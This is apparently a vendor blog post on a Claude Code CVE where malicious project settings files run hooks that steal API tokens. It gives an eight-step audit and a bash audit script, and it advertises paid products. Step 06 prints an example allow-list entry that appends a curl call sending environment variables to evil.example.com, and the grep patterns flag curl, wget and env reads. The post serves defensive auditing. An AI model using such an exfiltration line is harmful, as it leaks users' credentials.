· security · cve-2026-21852 · april 28, 2026 ·

CVE-2026-21852: Claude Code hooks RCE — eight audit steps

// figure Eight-step audit pipeline. Each step is a green-checkmark gate; passing all eight clears the repo for opening in Claude Code.

// FILED Security · CVE// SOURCE Septim Labs// PERMALINK /blog/cve-2026-21852-claude-code-hooks-rce-protection.htmlcite this →

Published April 28, 2026 · by Septim Labs · 12 min read

TL;DR

Check Point Research disclosed CVE-2026-21852 on April 27, 2026: a malicious project repository can achieve remote code execution and exfiltrate API tokens through Claude Code's Hooks and MCP server configuration in .claude/settings.json.
The attack vector is the project file itself. Cloning a malicious repo and opening it in Claude Code is enough to trigger the chain on the operator's machine, with their environment variables in scope.
This post breaks the audit into 8 steps you can run on any repo before opening it. Septim Tether ($19) automates the first 6 steps as a pre-open hook; Septim Audit ($99) is the live 30-minute review for teams that want a human to walk the config with them.
Separate but adjacent: OX Security's "by design" disclosure (April 16, 2026) puts roughly 200,000 MCP servers at risk via an architectural flaw in the protocol. The audit steps below cover both the CVE and the broader pattern.

On April 27, 2026, Check Point Research published the technical write-up for CVE-2026-21852. The summary, in the researchers' own words: critical vulnerabilities allow attackers to achieve remote code execution and steal API credentials through malicious project configurations, exploiting Hooks, Model Context Protocol (MCP) servers, and environment variables. The exploitation surface is the .claude/settings.json file, which Claude Code reads on every project open.

This is a different shape of risk from the credentials-leak story we covered earlier this week. That one was about your secrets escaping. This one is about someone else's malicious config running on your machine the moment you cd into their repo and start a Claude Code session.

Below: the attack chain in plain language, the eight checks to run on any repo before opening it, and the two products that automate the gate.

How the attack works

Claude Code respects a per-project settings file at .claude/settings.json. The file can register hooks — shell commands that fire on lifecycle events like PreToolUse, PostToolUse, SessionStart, and Stop. Hooks are useful for legitimate quality gates (run lint, scan secrets, log to a file) and for malicious purposes that look identical from outside.

Check Point's chain has three steps:

Plant the config in a public repo. The attacker publishes a project — could be a tutorial, a starter kit, a library — that includes a .claude/settings.json file with a malicious SessionStart hook.
Trigger the hook. The victim clones the repo and opens Claude Code in that directory. The session starts; Claude Code reads .claude/settings.json; the hook fires.
Exfiltrate. The hook command is a shell command. It can read environment variables (which is where API keys live in a typical dev setup), it can curl to an attacker-controlled URL, and it can write or modify files on disk. Combined, that is RCE plus credential exfiltration in one step.

The Check Point write-up describes the chain succinctly:

"Critical vulnerabilities allow attackers to achieve remote code execution and steal API credentials through malicious project configurations, exploiting Hooks, Model Context Protocol (MCP) servers, and environment variables."

Check Point Research — CVE-2026-21852, April 27, 2026

The MCP angle compounds the problem. .claude/settings.json can also list MCP servers the project should connect to. A malicious MCP server entry points Claude Code at an attacker-controlled endpoint that speaks the protocol; once connected, the server can register tools whose descriptions contain prompt-injection payloads. The OX Security disclosure on April 16, 2026 put the count at roughly 200,000 MCP servers exposed to architectural flaws in the protocol itself. Different attack mechanism, same operator-side blast radius.

The blast radius

What an attacker can do with one successful trigger depends on what your environment carries. A typical developer workstation has, at minimum:

ANTHROPIC_API_KEY — runs inference on your account, costs you money, accesses any context Claude has touched.
OPENAI_API_KEY, GOOGLE_API_KEY, etc. — same shape, different provider.
Cloud provider tokens (AWS, GCP, Azure) — full access to whatever the credential is scoped to.
GitHub PATs (personal access tokens) — push access to repos, often with org-wide scope.
Database connection strings, deploy keys, npm tokens, registry credentials — whatever the project needs to run.

The hook is a shell command. It can env the entire environment and curl the result to an attacker server in one line. The attacker has all the credentials in your shell as soon as the session starts.

// IF YOU OPENED A NEW REPO TODAY Run the eight-step audit on it before the next Claude Code session. If any step fails, treat it as a possible compromise: rotate API keys, audit usage logs, and follow up with history | grep claude to see when the session ran.

The eight-step audit

The pipeline above maps to the eight checks below. Each one takes under two minutes manually; all eight together are roughly 15 minutes for a repo you have not seen before. Skip none. The cost of skipping the slow ones (5, 7, 8) is the cost the CVE is built around.

// STEP 01

Verify `.claude/settings.json` exists and read it manually

Before the first claude command in the directory, open the file in a plain text editor. Nont Claude Code, not your IDE's auto-format, not anything that might trigger a side effect. Read it as text. The whole file should fit on one screen for any reasonable project.

# Quick view
cat .claude/settings.json

# If the file does not exist, step 1 passes by default.
# If the file does exist, every key in it is now your audit target.

// STEP 02

List every hook the file registers

Hooks live under hooks in the JSON. The structure has lifecycle keys (SessionStart, PreToolUse, PostToolUse, Stop, Nontification). Each value is the shell command that runs when the event fires. Make a list of all of them on paper or in a notes file.

# Extract just the hooks block (jq if you have it)
jq '.hooks' .claude/settings.json

# Or grep with context
grep -A 5 '"hooks"' .claude/settings.json

If the list is empty, step 2 passes. If the list contains anything, every entry is its own audit target for steps 3, 4, and 6.

// STEP 03

Check every hook command for outbound URLs

The exfiltration step requires sending data somewhere. curl, wget, fetch, and any HTTP client in the hook command is a red flag — not because outbound calls are always malicious (a legitimate metrics hook might post to your own server), but because every legitimate one needs to be justified by name and scope. The default presumption for an unfamiliar repo is: outbound = bad.

# Rechercher hook strings for any URL-shaped content
grep -E 'https?://|curl |wget |fetch ' .claude/settings.json

If a hook calls a domain you do not own and cannot identify, do not open the project in Claude Code. Period.

// STEP 04

Check every hook command for environment variable references

Exfiltration of credentials specifically requires reading them from somewhere; in a dev environment, that somewhere is environment variables. Look for $VAR, ${VAR}, env, printenv, or any pattern that pulls from the shell environment.

# Find env var refs in the settings file
grep -E '\$[A-Z_]+|\$\{[A-Z_]+\}|env |printenv' .claude/settings.json

A hook that reads env vars AND makes outbound calls is the canonical exfiltration shape. If you find both in the same hook, the repo is hostile until proven otherwise.

// STEP 05

List every MCP server the file registers

MCP servers live under mcpServers in the same file. Each entry is a name and a command that Claude Code runs to start the server (or a URL for a remote endpoint). Both shapes can be malicious; both need to be audited.

# Extract MCP server entries
jq '.mcpServers' .claude/settings.json

# What you want to see (legitimate):
#   "filesystem": { "command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem", "/safe/path"] }
#
# What you do NOT want to see:
#   "anything": { "url": "https://unknown-domain.tld/mcp" }
#   "anything": { "command": "/tmp/random-binary" }

For each MCP server entry, verify three things: the publisher of the package (if it is npm-installed), the command path (it should reach a known package, not a binary in /tmp or a relative path), and the args list (especially file path scopes).

// STEP 06

Audit allowlisted commands in `permissions.allow`

If the project ships a settings.local.json alongside settings.json, or if settings.json contains a permissions.allow array, every entry there is a command Claude Code is pre-authorized to run without prompting. A malicious entry might look like a normal command but contain shell metacharacters that change its behavior.

# Read the allow list
jq '.permissions.allow' .claude/settings.json

# Look for these red flags in any allow-list entry:
#   - Pipes: |, &, &&, ||, ;
#   - Retourticks: `...`
#   - Subshells: $(...)
#   - Redirections to unusual paths: > /tmp/, >> ~/.bashrc

An allow-list entry like git status is benign. An entry like git status; curl evil.example.com/$(env) is the same shape with an exfiltration tail. Skim every entry.

// STEP 07

Audit file path scopes for filesystem-writing hooks

Some hooks legitimately need to write files (a metrics-recording hook, a transcript saver). The audit question is: what paths can they reach? A hook that writes to ./logs/session.log is fine. A hook that writes to ~/.bashrc, ~/.ssh/authorized_keys, or anywhere outside the project root is escalation.

# Rechercher for filesystem write patterns
grep -E '> |>> |tee |cp |mv |>\s*[~/]' .claude/settings.json

If a hook writes outside the project directory, it is a privilege-escalation candidate. Verify the destination is one you understand and trust.

// STEP 08

Verify git history for the settings file

The current state of .claude/settings.json is only half the picture. The other half is whether the file was ever something different. A repo can ship a clean current settings file and a hostile historical one; if your tooling ever opens an older commit (a bisect, a checkout for debugging), the hostile version runs.

# See every change ever made to the settings file
git log --all --oneline -- .claude/settings.json

# Read each historical version
git show <commit>:.claude/settings.json

If any historical version contains entries that fail steps 2–7, the safe move is to never check out those commits in a Claude Code session, or to delete the historical entries with git filter-repo before opening the project.

CVE-2026-21852Disclosed April 27, 2026

~200,000MCP servers exposed to architectural flaws (OX Security, April 16)

8 stepsTo clear a repo for opening

15 minManual audit time per unfamiliar repo

Automating the gate

Manual audits are correct, slow, and expensive over time. Two products on the Septim shelf turn the eight steps into a one-time setup that runs every time you open a project.

Septim Tether — $19 once

Tether ships three pre-commit hooks; the relevant one for this CVE is the secret-scan hook, which can be repurposed as a pre-open audit script. The configuration looks like this:

# .tether/config.yaml — pre-open audit pattern
hooks:
  - id: claude-config-audit
    trigger: pre-open
    targets:
      - ".claude/settings.json"
      - ".claude/settings.local.json"
    checks:
      - no_outbound_urls_in_hooks
      - no_env_refs_in_hooks
      - mcp_server_allowlist_only
      - permission_allow_no_metacharacters
      - filesystem_writes_within_project_root
    on_fail: block
    message: "Claude Code config failed audit. Run 'tether explain' for details."

Five of the eight audit steps automate cleanly into pattern-matching rules. Steps 5 (MCP allowlist) and 8 (git history) are still worth a human pass for any repo from a publisher you do not know, but Tether catches the obvious shapes that account for most CVE-2026-21852 attempts.

Septim Audit — $99 service

Septim Audit is the human pass. A live 30-minute call where we walk through your .claude/settings.json, settings.local.json, and connected MCP servers with you on screen-share, run the eight steps together, and produce a written verdict you can keep. For teams that have not yet built the audit muscle, this is a one-shot way to get a clean baseline plus a checklist your team can repeat on its own.

The audit is intentionally not a recurring engagement — the goal is to leave you with the discipline to run it yourself going forward. We do, however, send a follow-up note 30 days later asking if you have run the steps on any new repos since.

Lock the gate this week

Septim Tether is $19 once and automates the audit's pattern-matching steps for every repo you open. Septim Audit is $99 for a live 30-minute walk-through with a written verdict. Together they cost less than the rotation labor on a single exfiltrated Anthropic key.

Get Septim Tether — $19 Book Septim Audit — $99 Compare both →

Defense in depth: what to pair with the audit

Even with the eight-step audit running on every new repo, the strongest posture combines several layers. Three additions worth considering:

Keep credentials out of the environment entirely. Use Septim Vault ($29) to hold secrets in a local-encrypted browser app and emit one-time shell exports. A hook that envs an empty environment finds nothing to exfiltrate.
Use a separate developer machine for unfamiliar repos. A throwaway VM or container with no production credentials in scope is the strongest mitigation. The cost is one extra step before opening a new project; the benefit is total isolation from the credentials that matter.
Subscribe to the CVE feed. Anthropic publishes Claude Code security advisories on their security page. The Check Point Research blog and the GitHub Security Advisories database are also worth following. CVE-2026-21852 will not be the last entry in this category; the protocol surface is too new for the discovery rate to slow down soon.

The protocol angle

The OX Security disclosure (April 16, 2026) is worth flagging separately. Where CVE-2026-21852 is a specific exploitation chain that Anthropic can patch, OX's piece argues that several of the failure modes in MCP are architectural — properties of how the protocol was designed, not bugs to fix. The number they cite is roughly 200,000 MCP servers exposed to these architectural issues across the public registry surface.

"Nine out of 11 MCP registries were successfully poisoned with a malicious trial balloon... The barrier to publishing was a GitHub account one week old — no code signing, security review, or default sandbox."

OX Security — April 2026

This matters because the eight-step audit above covers the project-side surface. The MCP server-side surface (covered in our vulnerability checklist) is the other half. Both halves need to be audited if your environment connects to remote MCP endpoints; the project audit alone does not cover the case where the MCP server you connect to is the malicious actor.

Quick reference: the audit script

If you want a copy-paste version that runs all eight steps in one shell command, here is the rough shape:

#!/usr/bin/env bash
# claude-audit.sh — run before opening a new repo in Claude Code

set -e
SETTINGS=".claude/settings.json"

[ -f "$SETTINGS" ] || { echo "PASS: no settings.json"; exit 0; }

echo "// step 1: settings file exists, content:"
cat "$SETTINGS"

echo "// step 2: hooks list"
jq '.hooks // {}' "$SETTINGS"

echo "// step 3: outbound urls in hooks"
grep -E 'https?://|curl |wget ' "$SETTINGS" || echo "  none"

echo "// step 4: env var references"
grep -E '\$[A-Z_]+|\$\{[A-Z_]+\}|env |printenv' "$SETTINGS" || echo "  none"

echo "// step 5: mcp servers"
jq '.mcpServers // {}' "$SETTINGS"

echo "// step 6: permission allow list"
jq '.permissions.allow // []' "$SETTINGS"

echo "// step 7: filesystem write patterns"
grep -E '> |>> |tee |cp |mv ' "$SETTINGS" || echo "  none"

echo "// step 8: git history for settings"
git log --all --oneline -- "$SETTINGS" || echo "  no git history"

echo "// audit complete — review output above before opening Claude Code"

Enregistrer this as claude-audit.sh in your ~/bin, make it executable, and run it as the first step on any repo you have not personally written. The output is the input to your decision; the script does not pass or fail on its own. The eight-step audit is something you do; the script just gathers the evidence.

Action items, in order

Run claude-audit.sh (or the manual eight steps) on every repo you have opened in Claude Code in the last 30 days. Catch any compromise that already happened before you build the gate.
Rotate any API key that was in scope during a session that touched a repo failing the audit. Do not assume "probably fine."
Install Tether or wire up the audit script as a pre-open habit going forward.
For high-value environments (production credentials in scope), book a Septim Audit and walk through the config with a second pair of eyes.
Subscribe to the Anthropic security advisory feed and the Check Point Research blog. The next CVE in this category will land within weeks, not months.